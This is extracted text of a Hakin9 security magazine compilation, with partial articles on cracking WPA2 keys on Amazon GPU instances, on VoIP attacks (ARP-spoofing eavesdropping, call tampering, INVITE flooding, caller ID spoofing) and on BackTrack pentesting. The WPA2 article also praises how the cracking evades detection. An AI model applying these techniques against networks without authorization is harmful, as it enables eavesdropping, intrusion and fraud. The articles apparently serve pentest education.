Beruflich Dokumente
Kultur Dokumente
Ar
tic
les
fro
Ha
kin
U P D AT E
NOW WITH
STIG
AUDITING
IN SOME CASES
nipper studio
HAS VIRTUALLY
REMOVED
the
NEED FOR a
MANUAL AUDIT
CISCO SYSTEMS INC.
Titanias award winning Nipper Studio configuration
auditing tool is helping security consultants and enduser organizations worldwide improve their network
security. Its reports are more detailed than those typically
produced by scanners, enabling you to maintain a higher
level of vulnerability analysis in the intervals between
penetration tests.
Now used in over 45 countries, Nipper Studio provides a
thorough, fast & cost effective way to securely audit over
100 different types of network device. The NSA, FBI, DoD
& U.S. Treasury already use it, so why not try it for free at
www.titania.com
www.titania.com
[ GEEKED AT BIRTH ]
DISCLAIMER!
THE BEST OF
Copyright 2014 Hakin9 Media Sp. z o.o. SK
Table of Contents
Using Amazon AMI for Cracking the WPA2 WiFi Hack 9
by Bruno Rodrigues
VoIP Hacking Techniques 16
by Mirko Raimondi
A Crash Course in Pentesting with Backtrack 33
by Nick Hensley
Using Hydra To Crack The Door Open 53
by Nikolaos Mitropoulos
NMAP and Metasploit for MS-SQL Auditing 61
by Jose Ruiz
Nmap: a Hacker Tool for Security Professionals 76
by Justin Hutchens
How To Reverse Engineer .NET files 88
by Jaromir Horejsi
Digital Forensics on the Apple OSX Platform 93
by David Lister
Passwords Cracking: Theory and Practice 100
by Theodosis Mourouzis
How to Use OpenVAS (Vulnerability Assessment System)? 107
by Willie Pritchett
How Do I phish? Advanced Email Phishing Tactics 117
by Brandon McCann
How to Brute-force Drupal6 Login Pages? 124
by Kevin Simons
How to Conduct VPN Pivoting? 135
by Ayman Hammoudeh
Cracking WPA/WPA2 Key Using Reavar 140
by Badrish Dubey
How to use Socat and Wireshark for Practical SSL Protocol Reverse Engineering? 146
by Shane R. Spencer
5
THE BEST OF
How to Identify and Bypass Anti-reversing Techniques? 153
by Eoin Ward
Capturing WiFi traffic with Wireshark 165
by Steve Williams
Wireshark/LUA 175
by Jrg Kalsbach
Tracing ContikiOs Based IoT communications over Cooja simulations
with Wireshark Using Wireshark with Cooja simulator 181
by Pedro Moreno-Sanchez and Rogelio Martinez-Perez
Digital Security and Risk Analysis Side Channel Attack
with Brain Leading to Data and ID Theft 190
by Massimiliano Sembiante
Raspberry Pi Hacking Loving your pi and hacking it too 199
by Jeremiah Brott
Bluetooth Hacking Tools 220
by Dennis Browning
Create a Basic Web Application Scan Policy 227
by Johan Loos
Create a Basic Scan Policy in Nessus 5 233
by Johan Loos
Cross-Site Scripting (XSS) 238
by Badrish Dubey
Implementing Rsylog to forward log messages on an IP network 247
by Lara Sanz
Weak Wi-Fi Security, Evil Hotspots and Pentesting with Android 253
by Dan Dieterle3
Pentesting with BackTrack distribution 261
by Jan Hrach, Miroslav Ludvik, Michal Srnec
Use Metasploit in Backtrack 5 270
by Johan Loos
Using REMnux to analyze PE files 280
by Glenn P. Edwards Jr
Recovering Passwords and Encrypted Data Remotely in Plain Text 285
by Daniel Dieterle
Trojan-izing USB Sticks 291
by Gerasimos Kassaras
6
THE BEST OF
Deceiving Networks Defenses with Nmap Camouflaged Scanning 296
by Roberto Saia
Cross Site Request Forgery Session Riding 308
by Miroslav Ludvik and Michal Srnec
Data Logging with Syslog A Troubleshooting and Auditing Mechanism 315
by Abdy Martinez
Caffe Latte Attack 323
by David Jardin
Reverse Engineering C++, a case study with the Win32/Kelihos Malware Family 330
by Benjamin Vanheuverzwijn, Pierre-Marc Bureau
Cyber Warfare Network Attacks 339
by Daniel Dieterle
Understanding conditionals in shellcode 346
by Craig Wright
Creating a Fake Wi-Fi Hotspot to Capture Connected Users Information 355
by Roberto Saia
Accurate Time Synchronization with NTP Hardening your Cisco IOS Device 367
by Abdy Martinez
DNS Cache Poisoning 373
by Jesus Rivero
Beyond Automated Tools and Frameworks: the ShellCode Injection Process 381
by Craig Wrigh
Tabnapping Attack Hijacking Browser Tabs 389
by Abdy Martinez
Using the Social Engineering Toolkit to Test Network Security 396
by Daniel Dieterle
Starting to Write Your Own Linux Shellcode 404
by Craig Wright
How to Recover Passwords from a Memory Dump 411
by Daniel Dieterle
Tag: Youre Infected! QR Codes as Attack Vectors 417
by Tim Klup
THE BEST OF
e are glad to present our first THE BEST OF HAKIN9 in 2014. This time we wanted to
sum up last 3 years of our work and thus, we prepared a special collection of 48 top Hakin9
articles. Inside you will find more than 400 pages of how-to and step-by-step tutorials
that will surely contribute to your development as a professional pentester, exploiter or ethical
hacker.
We hope that this pack will shed some light on the direction our publication took after it underwent
major changes such as switching to electronical version (.pdf and .epub formats) or focusing mostly
on exploiting and hacking techniques and tools.
This compendium is also a fine introduction to even greater changes in our magazine as it shows
You, our Reader, the topics that are most burning and eagerly read by Hakin9s audience. We
decided to stress the need to meet your high expectations and, in the forthcoming publications,
supply You with recurring issues of the topics as Exploiting Software, Reverse Engineering,
Pentesting, Offensive Programming, Network Cracking.
We hope You find these changes proper and satisfactory. We strongly encourage all of You to send
us many messages about your needs and expectations as this publication is devoted to You and
would not exist without its Readers. Please remember that we are always open to Your ideas and it is
You, who decide on the following topic of Hakin9.
Feel free to share your views and comment on our recent and future work by sending us a message
to en@hakin9.org with COMMENTS in the subject. We respond to all your inquiries.
We wish you a good read,
Krzysztof Samborski
and Hakin9 team
THE BEST OF
THE BEST OF
So, normal word list with Crunch is out of the question. But wait, why dont we pipe Crunch into Pyrit
anyway? Would that make a difference?
A few words about the above command: we are saying to Crunch to generate all combinations of 8
characters, where we have provided the characters to use (its just easier if I pick all the characters I know
and it will get the job done), piping the results to Pyrit that will use them (-i -) to pass through the attack to
the .cap file for the Wi-Fi test network (SSID).
As you can see around 2000 PMKs per second would take us years to brute force, making it a not so viable
way to hack WPA2 Wi-Fi networks. I found this link over the internet that can explain the magnitude of time
it would take http://www.lockdown.co.uk/?pg=combi. I know that youll probably think this is not how you
do it. You probably need to go for CUDA Pyrit. And youre right. For now I just want to show you that the
normal Desktop/laptop just wont cut it.
There is no efficient way to do it. No efficient way on how to do it. This is the part where I lay down my
method. And no, we wont be using CUDA at this stage, since we wont be talking about the 5 Trained
Monkeys yet (and they hold hands together). So, whats the method? And why are we using Pyrit?
The reason is simple: Pyrit uses an awesome feature that allows you to attack a capture using a pre-loaded
database. And why is that relevant? Because it does it by the millions per second, and because we can start
the process of our rainbow tables. In one word, it ESCALATES. Meaning we can potentially break any
length WPA2 password and I always wanted to get my hands on this solutions.
So, lets see how my poor laptop does when first create the words and then import them to a database.
We are still going to stick with Crunch and Pyrit. Pyrit comes with a pre-installed database out of the box
that you can use. Still, I leave it to you to connect to external databases that can escalate much better than the
ones on my PC.
Based on what we did previously, well going to make this in 3 steps:
Create the word list based on the same characters used before
10
THE BEST OF
Create the batch and attack
THE BEST OF
The AMI we are using comes empty and, therefore, we need to put all that tools we require in.
For a job well done, well require Python 2.5, CUDA Pyrit and Crunch. Only then well be able to put this
baby to the test. For now, Ill assume that you, the reader, have the knowledge to do the above or, at least,
have a Master in Google search, where you can find all the information you require doing it.
This article is not about getting Crunch and Pyrit and, therefore, I wont go deep into it. Lets just say that
some users out there did us the favour of compiling some interesting scripts that will allow us to get Pyrit
(and some other bonus tools) up in running in seconds. Thats the power of the AMI: huge bandwidth and
computer power.
For performances sake, Ive decided to run Pyrit benchmark test and the results are just awesome.
Things are looking good. We should now see how much faster we can crack our test network. First Ill pipe
Crunch to Pyrit and then Ill use the built-in database to attack the .cap file.
12
THE BEST OF
Technically speaking, lets walk step by step so you can see the wonders of what we are doing. This time,
and because Ive already mention it, Ive decided to go with a different AMI so you can see the different
options available. Also be careful about the example you choose, as many options have different prices
and performances. I went with an AMI from Amazon GPU prepared and the g2x2large example more
expensive but definitely worth it.
Step one
get the right tools for the job. Again, I wont waste time here since I believe that the hackers that kept
reading until now understand the power of Google and will be able to do this in a heartbeat. Remember that
this wont be your production machine but, instead, a template we are creating so we dont have to do part of
the process every time we want to hack a Wi-Fi network. Also, it will allow us to construct our 5 Monkeys
model, where resources are spanned and not physical.
Step two
Create a small fraction of the word list. Now, this is where it got trick. Never the less and after going through
Crunch manual we figure out a way to break the word list in small pieces. It actually breaks it to a maximum
file size and gives it a name, allowing us to re pick where it stopped and create from there on. If you notice
the -c option youll see Ive chosen a huge value so Pyrit could actually tell me which maximum value I
should use.
Figure 9. Crunch
Pay attention to the last sequence in file name: xxxxx-yyyyy.txt. Youll need to correct the minimum number
of characters on the crunch command to match the number of yyyyy.
13
THE BEST OF
Step three
Upload all the files to Pyrit database. Another way you have to do it, would be to generate the word files on
your local computer and upload them to the VM. You have the bandwidth so why use the storage for more
than a database. This way you wont take space with useless files. Youll upload to one VM and place it
directly on Pyrit and do a manual distribution to other VMS. You can schedule the time and leave it running
during the night, since youll probably have more cheap storage attached on your computer.
Step four
Save the VM as a template. This step is pretty easy and straightforward. You just go to your EC2
management console, choose the instance you want (in this case all the instances created are pre-loaded with
the word lists) give it a name (my advice would be to choose something like nameoffirstfile-nameoflastfile
so you know what this VM is supposed to process) and choose create image.
Step five
Launch all the instances, insert the ESSID in Pyrit and run the batch.
Step six
Upload the cap file and attack it with Pyrit DB. I just want to add a note off-topic in this step (Im using
an Android application on my phone called Linux Deploy that allow us to install Kali Linux ARM version
pretty easy). You can then, when walking down the street, get a perfect cap file for the handshake of any WiFi network that you encounter, scp the file to Amazon cloud and let the Monkeys do the work for you. After
all they are trained.
Youll notice that all the steps might take some time, like the word creation, VM creation and upload to
Pyrit database but in fact you just doing it once, saving it as a template and creating new VMS from the
ones previously created. It will take you some time, but youre doing a kind of Rainbow tables for Wi-Fi so
expect some work prior to attack and cracking.
As you can see, all the tools and servers mention are not new to us, Hackers. Its a matter of using some
of the available tools and redefine the strategy we will use to attack whatever we can attack, make it more
efficient and faster. My challenge here was to see how the mental process can be built and hope that the
readers might think about other attacks or hacks that although being new, with a different strategy, might get
you in where it wasnt possible before.
New tools, new clouds and processing power will keep emerging and we hackers have to start thinking
how we can leverage a good technology and give it the power it needs to achieve what we want. Also, this
strategy defined here will probably go undetected. The capture and the cracking occur in different moments,
and the cracking itself wont raise any flags anywhere. Not even on Amazon.
I just hope that if you Security Guys from Amazon are reading this, that you understand that we wont be
using this for bad things. Keep in mind that we should only use this technique for Authorized testing or
educational purposes. Always get permission or use your own network, before you start cracking.
Bruno Rodrigues is an enthusiastic network engineer with the necessary drive and
determination needed to resolve complex networking issues. Possessing effective
organizational skills and excellent working knowledge of networking technologies and
having a commitment to keep up to date with the latest developments. Experienced in
providing motivation, guidance and an up to date networking consultancy service to both
colleagues and clients.
14
cigital
SecureAssist
Find and Fix Security Defects
During Development
Plug-in for Eclipse and Visual Studio identifies common
security vulnerabilities and provides remediation guidance
Expert validated
Contextual
Actionable
Customizeable
THE BEST OF
Initially, the PSTN was a simple one-to-one telephone line connecting phones from one room to another.
When telephone business grew up, Private Branch eXchanges (PBX) were designed, and deployed in office
settings to provide the increasing of telephone lines and to connect internal callers (over trunk lines) through
either the PSTN or eventually to destination callers. When PSTN became digital, a method called Time
Division Multiplexed (TDM) was created. TDM transmits and receives independent signals over a common
signal path by means of synchronized switches at each end of the transmission line, in this way each signal
appears on the line only a fraction of a time in an alternating pattern.
Voice over Internet Protocol (VoIP) is a newer technology that allows phone conversations to be transferred
over the computer networks, it transforms analog and digital audio signals in data packets. VoIP usually
refers to communications multimedia applications which are transported via Packet-Switched Network
(such as Internet) instead of the PSTN. VoIP has seen rapid implementation over the past few years, many
users choose the VoIP to leave behind the traditional telephonic providers in order to pay cheaper bills;
for companies using VoIP is an easy way for communication between their several branches and for their
teleworking employees.
An example of a simple VoIP network can be seen in Figure 1 where VoIP works as a private telephone
network and it is transparent to the PSTN. Software Phones (also said Softphones), IP Phones and Analog
phones (which must use VoIP adapter) can connect to a PBX, where internal telephone are connected to
public lines or other VoIP systems on the Internet. Using VoIP Media Gateway, a VoIP phone can call a
legacy phone on the PSTN and vice versa with no problems since Media Gateway translates the IP packets
into TDM.
VoIP services are often taken in use but their security threats are analyzed only under specific aspects or not
taken in consideration at all. This article analyzes the most common VoIP threats in order to identify existing
weaknesses and suggests available countermeasures. For each threats an example of attack is reported and
explained since, in authors opinion, the knowledge of the tools that could be used by attackers is important.
In this way the VoIP current situation will be analyzed from attackers point of view to discover the most
vulnerable parts of the system. The results of this article could be used by system administrators, network
engineers and penetration tester in order to examine their VoIP systems.
The author of this paper discharge all responsibilities for an inappropriate use of the information here
reported and suggests to try these attack techniques only in controlled environments, like test plants,
and with previous authorization of the owner.
16
THE BEST OF
17
THE BEST OF
Hence receiving endpoints are designed with the assumption that RTP packets will not arrive at the precise
rate they were transmitted. About this reasons an endpoint incorporate a Jitter Buffer having parameters
in order to manipulate the characteristics of time buffering in an attempt to produce the highest Quality of
Service during the playback. Jitter Buffer uses RTP header information to accomplish its functions.
THE BEST OF
Response Messages contain numeric codes, there are 2 types of responses and 6 types. In the following the
Response types are reported:
1. Provisional: its own class is1xx, this kind of responses are used by the server to indicate a progress state
but they cant terminate SIP transactions;
2. Final: its own classes are 2xx, 3xx, 4xx, 5xx, 6xx, this kind of responses terminate the SIP transactions.
The different types of classes, divided by their prefix number, are reported in the following:
1xx: provisional, searching, ringing and queuing. Two examples of these messages are 100 Continue and
180 Ringing;
2xx: success. An example is the message is 200 OK;
3xx: redirection and forwarding. Examples are messages 301 Moved Permanently and 302 Moved
Temporarly;
4xx: request failure for client mistakes. The messages 400 Bad Request and 408 Request Time-Out are
two examples of these messages;
5xx: server failures.
6xx: global failure such as busy, refusal, not available. The messages 600 Busy and 604 Does Not Exist
are two examples.
SIP messages are composed of 3 parts:
1. Start Line: each SIP message begins with this part. The Start Line conveys the message type (method
type in Requests and Response code in responses) and the protocol version. The Start Line may be either
Request-line (request message that includes a Request URI, which indicates the user or service to which
this request is being addressed. Unlike the To field) or Status-line (response message which holds the
numeric Status-code and its associated textual phrase);
THE BEST OF
said respectively a call continuation and the ring back tone. After about 10 seconds the called user answer is
stated by packet 647 which reports a Response Message OK belonging to the class 2xxx, now the telephone
call is established. The telephone call duration is about 40 second, then the caller hang up the telephone, it is
stated by packet 4985 which reports a BYE Request Message in order to close the call.
Figure 3 reports a detail of the packet number 421 which is registered again by mean of Wireshark. Its an
INVITE Request Message where Start Line, Header Fields and Body are clearly visible.
Information Gathering
In previous section the features of network devices was reported by the author in order to help the reader
to understand the following example, but in the reality the network administrator would like to hide that
information in order to make harder any attack. In this way an attacker, with its only strengths, must to discover
all information about the network features before to start any kind of attack, this is always the first phase of
20
THE BEST OF
any attack and is called Information Gathering: the attacker gathers information about network devices in order
to learn as much information as he can. In particular the attacker could be interested about: network hosts,
network servers, PBXs types and versions, VoIP Media Gateways, SIP clients types and versions.
Several free tools could be used by an attacker to accomplish this action: SMAP, SIPSAK, SIPSCAN
and SVMAP. The author will use SVNMAP, it belongs to a suite of SIP tools called SIPVICIOUS (others
tools of this suite will be treated in the following sections). Some SVMAP capabilities are reported in the
following list:
scan identify and fingerprint a single target IP, an IP range or even an entire subnetwork;
network interface and local port selection for outgoing packets;
identify SIP devices and PBX servers on default and non-default ports;
scan just one host on different ports, looking for a SIP service on that host or just multiple hosts on
multiple ports;
take previous scan results as input, allowing you to only scan known hosts running SIP;
use different scanning methods (OPTIONS, REGISTER, INVITE, etc.);
get all the phones on a network to ring at the same time (using INVITE as method);
randomly scan internet ranges resume previous scans.
SVMAP allows specifying the request method that will used for scanning (which is by default the OPTIONS
method), you can specify a different method to scan with, such as REGISTER and INVITE (Attention
please! INVITE method can be noisy and generate a ring at the other end). The list of usable methods is
reported in the following:
INVITE: a client is being invited to participate in a call session;
ACK: confirms that the client has received a final response to an INVITE request;
BYE: terminates a call and can be sent by either the caller or the callee;
CANCEL: deletes any pending request;
OPTIONS: queries the capabilities of servers;
REGISTER: registers the address listed in the To header field with a SIP server;
PRACK: provisional acknowledgement;
SUBSCRIBE: subscribes for an Event of Notification from the Notifier;
NOTIFY: notify the subscriber of a new Event;
PUBLISH: publishes an event to the Server;
INFO: sends mid-session information that does not modify the session state;
REFER: asks recipient to issue SIP request (call transfer);
MESSAGE: transports instant messages using SIP;
UPDATE: modifies the state of the session without changing the state of the dialog.
21
THE BEST OF
Extensions Enumeration
Extensions Enumeration is an important VoIP attack used in order to identify the live SIP extensions.
SVNWAR is a free SIP extension line scanner and it will be used by the author in order to accomplish this
kind of attack. SVNWAR belongs again to SIPVICIOUS suite and works similar to traditional wardialers by
guessing a range of extensions or a given list of extensions. Some SVMAP capabilities are reported in the
following list:
identify extensions on PBXs and through SIP proxies;
scan for large ranges of numeric extensions;
scan for extensions using a file containing a list of possible extension names;
use different SIP request methods for scanning since not all PBX servers behave the same;
resume previous scans.
THE BEST OF
Since ACLs dont avoid ARP spoofing attack and Caller ID spoofing attack (theyll be treated in the
following sections), in order to get an harder network protection, Switches must be configured in a right
manner: all unused ports should be disabled and used ports must be configured with port-security option
in order to avoid intruder devices in the network.
Eavesdropping
Eavesdropping is the act of secretly listening a VoIP conversation of others without their consent, this could
be done by mean of packet capture which is the process of intercepting and logging traffic by mean of
Network Analyzers.
As already reported in previous sections, a Network Analyzer is a computer program (such as Wireshark) or
a piece of computer hardware that can intercept and log traffic passing over a particular types of networks,
such as either an Ethernet or a Wireless. As data streams flow across the network, the sniffer captures each
packet and, if needed, decodes the packets showing the values of various fields according to the appropriate
RFC or other specifications. Packet capture can be used by attackers over VoIP networks in order to
capture SIP Requests and RTP data sent from UAC to UAS and back. In this section call Eavesdropping is
obtained by mean of a Man In the Middle (MITM) attack which means that the attacker makes independent
connections with the victims and relays messages between them, making them believe that theyre talking
directly to each other over a private connection but the entire conversation is instead controlled by the
attacker. In order to obtain MITM, the attacker can sends fake (spoofed) Address Resolution Protocol
(ARP) messages in the Local Area Network (LAN), their aim is to associate the attackers Media Access
Contro (MAC) address with the IP address of the PBX, in this way any traffic meant for that IP address to be
sent to the attacker instead, this technique is said ARP spoofing.
Figures 6 and 7 report the ARP spoofing technique executed by author by mean of ARPSPOOF tool, the
first figure reports the spoofing of the UAS (PBX) and the latter the spoofing of the UAC#1 (Linux Mint
Box). With these two commands, the attackers change its MAC address spoofing the victim MAC address
and then it sends Gratuitous ARP (GARP) message announcing to UAS and UAC#1 the change. When the
commands will be executed, the ARP cache of UAS and UAC#1 will be poisoned and all packets exchanged
by UAS and UAC#1 will pass through the attackers Linux Box, in this way the attacker can register entirely
a conversation.
Figure 8 reports a call trace obtained between UAC#1 and UAS by mean of Wireshark on the attackers
Linux Box, as you can see by the picture a SIP handshake is followed by RTP traffic. Wireshark stores its
call trace in .pcap files (since its developed by mean of a library called libpcap) and provides one capability
which permits to decode and play RTP voice packets, Figure 9 reports an example of this feature.
23
THE BEST OF
Telephone Tampering
Another attack that can be performed by mean of MITM is Telephone Tampering, it is a form of sabotage
which concern an intentional modification of carried signal in a way that would make them harmful to the
user. RTP is a media protocol which makes VoIP vulnerable to the Tampering, RTP is often sent unencrypted
and runs over an unsecure transport protocol called UDP.
Attacker can capture an RTP packet (by the means of MITM attack) and create RTP packet similar to the
original but with a greater timestamp and sequence number. In this way the attacker can trick the victim
endpoint to reject RTP messages from the legitimate endpoint in favor of the injected packets, since the original
packets appear old. As packets have a valid and unchanged SSRC (synchronization source identifier that
characterizes the current session), they are accepted as a part of original transmission. Telephone Tampering can
have very serious consequences, because caller and called party consider themselves trusted parties.
24
THE BEST OF
Figure 10 shows an example of the Telephone Tampering attack obtained by mean of RTPINSERTSOUND
tool, this can be used to inject a .wav file (selected by the attacker) into the RTP stream, replacing the voice
signal from one side with the signal within .wav audio file.
Authentication Attacks
In the past SIP used weak authentication where password was sent in plain text, making it easy to obtain
for anyone who could get access to SIP messages. Since this authentication was insecure it was deprecated
and now, in SIP 2.0, MD5 message-digest algorithm is used for hashing the UAC password. When a UAC
wants to authenticate with a UAS, UAS generates and sends a digest challenge to the UAC. The simplest
authentication challenge that a UAS can send contains a Realm (used to identify credentials within as SIP
message, usually it is the SIP domain) and a Nonce (this is an MD5 unique string generated by the UAC
for each registration request, it is made from a time stamp and a secret phrase to ensure a limited lifetime
and it cant be used again) as reported in the following: WWW-Authenticate: Digest algorithm=MD5,
realm=asterisk, nonce=3cf75870 Once the UAC receives the digest challenge and the user enters his
credentials, the client uses the nonce to generate a digest response and sends it back to the server:
25
THE BEST OF
Authorization: Digest username=1234realm=asterisk,nonce=3cf75870, uri=sip:1000@192.168.101
.105,response=cf89107228a444c1e8b761dfb6e669e4, algorithm=MD5
The UAS will then perform the same process to arrive at its own MD5 hash and if it matches with the one
supplied by the UAC, UAS responds with 200 OK message and UAC has obtained the authentication.
26
THE BEST OF
27
THE BEST OF
THE BEST OF
need significantly longer time to establish a connection. Moreover you can flood the PBX with an inexistent
extension; thus making it generate a 404 not found just to keep it busy. Figure 17 reports a registration of
packets received by the victim obtained again by mean of Wireshark, you can see a lot of INVITE Request
Message was sent to the victim.
29
THE BEST OF
TEARDOWN is a tool used to terminate a call by sending a Bye Request Message, before using
TEARDOWN you must to capture a valid SIP OK Response Message in order to use it From and To
tags and a valid caller ID value. Figure 18 reports the help command that belongs to TEARDOWN.
In order to avoid DoS attacks, a network administrator can include a logical network partitioning called
Voice VLAN. The basic concept behind Voice VLAN is that you can to dedicate a separate VLAN with a
separate subnet for Voice traffic, this keeps contention between data and voice to a minimum and is easier
to manage. Another solution could be a stateful firewalls with application inspection capabilities, policy
enforcement to limit flooded packets, and out-of-band management in order to permit to the network
administrator to reply to the network events at the attack moment by mean of a network monitoring.
Spoofing Caller ID
The caller ID is fairly easy to spoof in SIP, you just need to change the SIP INVITE Request Message from
header. In order to spoofing the caller ID several tool can be used, for example SVWAR, a tool already
used in a previous section and belonging to SIPVICIOUS suite. The authors choice for this attack is again
INVITEFLOOD, but in this example it is not used in order to flood the VoIP phone but to fake the Caller
ID. Figure 20 shows this kind of attack, as you can see by the picture INVITEFLOOD sends one INVITE
Request Message to the victim in order to spoof a Caller ID (-a spoofed) and making the victim phone
rings. Figure 21 reports the caller ID spoofed displayed as the Incoming Call by X-Lite.
THE BEST OF
Conclusions
The aim of this article was developing a reliable VoIP hacking methodology overview that could be
used against a VoIP network. Attack vectors including Information Gathering, Extensions Enumeration,
Eavesdropping, Telephone Tampering, Authentication Attacks, Denial of Service, Identity Spoofing
are re-ported and explained by mean of real examples accomplished by embedded tools. Moreover, the
countermeasures reported in this article should be used by system administrators, penetration tester or
network engineers to mitigate possible security threats.
On the Web
Mirko Raimondi obtained his Masters degree in Computer Science from the University
of Milan Computer Science Department. He worked as a Software Engineer at
ITALTEL an Italian leader company in telecommunications industry where he was
being the project leader of Netmatch-S Lite Edition, a VoIP Session Border Controller
based on the virtual platform and running on commercial hardware. In test plant of
ITALTEL he realized testing scenarios by mean of Cisco L2/L3 devices and he has a
CCNA-security in course. Currently, he works in automotive industry, where he has
realized an audio/video/meta-data multiplexer in order to hide GPS data in mov _les. Hes interested in
VoIP telecommunications, network security, steganography methods and computer forensics. You can
contact him either through LinkedIn: http://it.linkedin.com/pub/mirko-raimondi/14/182/58a or via
e-mail: web.mirk@gmail.com.
31
Register Early
and SAVE!
Sheraton Boston
Get the best real-world Android
developer training anywhere!
Choose from more than 75 classes and in-depth tutorials
Network with speakers and other Android developers
Check out more than 40 exhibiting companies
A BZ Media Event
#AnDevCon
THE BEST OF
33
THE BEST OF
OSSTMM: http://www.isecom.org/research/osstmm.html
OWASP: https://www.owasp.org/index.php/OWASP_Testing_Project
Note
OWASP is actually in the process of updating to v4 and have a draft available on their site.
Your agreement will no doubt look differently than ones I have used, and will be living document and will
change over time. At a minimum I would suggest including the following in any agreement between you and
your client:
Start and End Date
Times the Testing can take place
List of internal contacts
Your contact information
List of Targets
Special Attention Targets
Targets to Exclude
Type of Testing to be Performed along with the Depth of the Engagement
If they want you to Perform Denial of Service Attacks a space to justify it
A Disclaimer about the Possibility of Bringing Down a System(s) or Service(s)
A place for them to release you from damages that may occur
Signature of the Approver and his/her Title
Often when first engaged with clients they wont have any idea what their options are and in some cases what
they even want tested. So I will explain to them what I can do, describe different attack vectors and avenues a
malicious person can and will use to try and gain access to their infrastructure. This can take some time and will
usually be very back-and-forth between you and your client. Both sides asking and answering questions.
The First real question I ask is What is your primary concern, that is what you are most concerned with,
or where do you think you have the most risk? Their answer to this question will help you to guide
them throughout the rest of the conversation. Some clients may have just had a breach from the outside,
others may have installed some new piece of network hardware and noticed they have a lot of outbound
connections to countries their employees should have no business need to access, and yet others with only a
test to satisfy compliance. Depending on their answer, I will usually make a recommendation and have them
agree that my recommendation is indeed what they are asking/looking for. Sometimes it will depend on what
they have had tested in the past. If its a new client, or one that hasnt had a true penetration test in a while, I
will suggest that the test basically utilize a three pronged approach, and recommend at a minimum the testing
be performed, by focusing on the external (from the Internet), internal (user space and server), and web
applications (both Internet accessible and internal).
At times I will have clients say something like Well, were not really worried about internal, this when I
explain to them about what happens when someone spoofs an email from CEO and sends a malicious PDF
file to their Domain Admin that creates an outbound connection to the attackers laptop, and that the attacker
will then have a direct tunnel into their internal network, and ask what happens if he installs a key-logger on
that admins machine?
34
THE BEST OF
Again the main point here is that the conversation will go back-and-forth and sometimes may involve multiple
conference calls with different people before they decide on what they want tested, and you may have to
explain and give examples about what the attacker is capable of. At the end of the day you are working for the
client, and will want to provide them with the best course of action given their specific needs. The ultimate goal
is to agree upon what is to be done, and have the appropriate person sign off on what you are about to do.
Figure 1.Backtrack_download
35
THE BEST OF
Installing Backtrack
Ill start out by assuming you have a Windows machine. First thing you will need is a way to run the BackTrack
VM. If you dont already have it head over to VMwares website and download vmplayer; its free for personal
non-commercial use http://www.vmware.com/products/player/. Vmplayers installation is very straight forward
so I wont cover that here. Next you need to download the BackTrack VM from http://www.backtrack-linux.
org/downloads/ as there are many different versions and options you can pick when downloading just make
sure you set your options as follows we will be downloading the latest BackTrack 5 R3: Figure 1.
BackTrack decided to use 7zip to compress their file, so if you have an issue extracting the archive you can
download 7zip from http://www.7-zip.org/ and use it to extract the vm. Once you have everything downloaded,
installed, and extracted. Go ahead and launch VMWare Player. The First thing you will need to do before you
Play the BackTrack VM is to change a setting or two. Click on Edit virtual machine settings on the right select
Network Adapter and then on the left, Change the Network Adapter Connection type from NAT to Bridged
and click the Save button so that it looks like this: Figure 2.
Figure 2. Bridged
Note
The BackTrack virtual machine comes set for 768M of RAM Depending on the total amount of RAM you
have available to your system you may want to increase that!
Now go ahead and start the BackTrack virtual machine by clicking on Play virtual machine. The first time
you start up any virtual machine you have downloaded or moved from machine to machine VMWare Player
will ask you a question, select the I copied it button (Figure 3).
Figure 3. I copied it
36
THE BEST OF
When the VM first starts up, if you have any USB or other devices connected it will give will prompt you
with another message, letting you know that you can connect those devices to the virtual machine you do
not want to do that here.
Once the BackTrack VM has finished booting you will see a login prompt like this: Figure 4. The default
login is root and the password is toor.
Figure 4. Login
Once you are at the prompt, go ahead and make sure you have an IP address by typing:
ifconfig
You should see that your DHCP server has handed you an IP address on your local network, if you see
something other than the right subnet for your network, you need to go back and check that you are running
in Bridged mode and not NAT. While things will work with a NATted IP address, if you are trying to exploit
a machine on a real subnet you will have to make changes to your host to pass the traffic back-and-forth.
The output from the ifconfig command should look like this: Figure 5. Next start up the windows manager
with the command:
startx
37
THE BEST OF
Listing 1. Uninstall Metasploit
cd /opt/metasploit
./uninstall
apt-get update
apt-get upgrade -y
cd ~
http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.runwget
chmod +x metasploit-latest-linux-installer.run
./metasploit-latest-linux-installer.run --prefix /opt/metasploit --mode unattended
nmap --script-updatedb
With the new version of Metasploit you will need to register in order to get updates.
If you want to register open up a browser and go to https://localhost:3790.
You will see the following screen (Figure 7) click the GET PRODUCT KEY button (Figure 8).
38
THE BEST OF
BackTrack comes with a lot of plugins for Firefox, you may need to disable these in order to register!
After you have filled out their form click on the GET FREE LICENSE button.
Once you have registered in order to update Metasploit, at the command prompt type:
msfupdate
Nmap
Nmap (or Network Mapper) is a security scanner that provides many features for probing computer
networks, such as host discovery, service detection, operating system fingerprinting, and a whole lot more.
Nmap is very powerful and has a ton of options you can read more about it here http://nmap.org, and all its
various options. A full reference of all the switches for Nmap can be found here http://nmap.org/book/man.
html. But I will be showing a few Nmap commands that will help ease your way.
The first command we are going to run will let us get a list of all the live hosts on our network and output
those to a file. You could skip this step and simply run the next Nmap command but it will take a whole
lot longer! We also want to exclude our Attack Platform so you will need to know the IP address of your
BackTrack virtual machine along with the IP of your Windows host OS (and any other hosts you dont want
to scan). When the command completes you will have a live_hosts.txt file but lets check it to see what hosts
you found on your network (Figure 10).
nmap -sn -T5 192.168.1.0/24
--exclude 192.168.1.1,192.168.1.115,192.168.1.117
|grep Nmap scan|cut -d -f5 >live_hosts.txt
cat live_hosts.txt
39
THE BEST OF
Note
I added the --script-args=unsafe=1 option (you didnt use to have to do this, but with the newer versions of
Nmap you miss quite a bit of exploitable goodness. If you are unsure, you can leave that option out).
Once Nmap fires off, you should see something that looks like this appear in your terminal: Figure 11.
40
THE BEST OF
Vulnerability Scanning
Next up you will need to identify if any of these hosts contain vulnerabilities. Vulnerability Scanners are
another class of tool that any pentester will be able to use to quickly identify hosts which may be vulnerable
to exploitation. Usually I would start with a vulnerability scanner like Nessus or Core Impact, and then run
an Nmap scan. But for the workflow here and wanting to give you the ability to use BackTrack using only
free tools so that you can replicate this in your test or home environment; we will be using OpenVAS.
Nessus
Nessus does have a free for home use license and while I suggest you install it and give it a try, it is limited
to the number of IP addresses that you can scan. The Full version basically has no limitations and for the
price cant be beat. Nessus can be found at Tenables website and can be downloaded here http://www.
tenable.com/products/nessus. Nessus currently has over 50,000 checks for vulnerabilities and you can also
add in credentials (if known) for an even deeper analysis.
OpenVAS
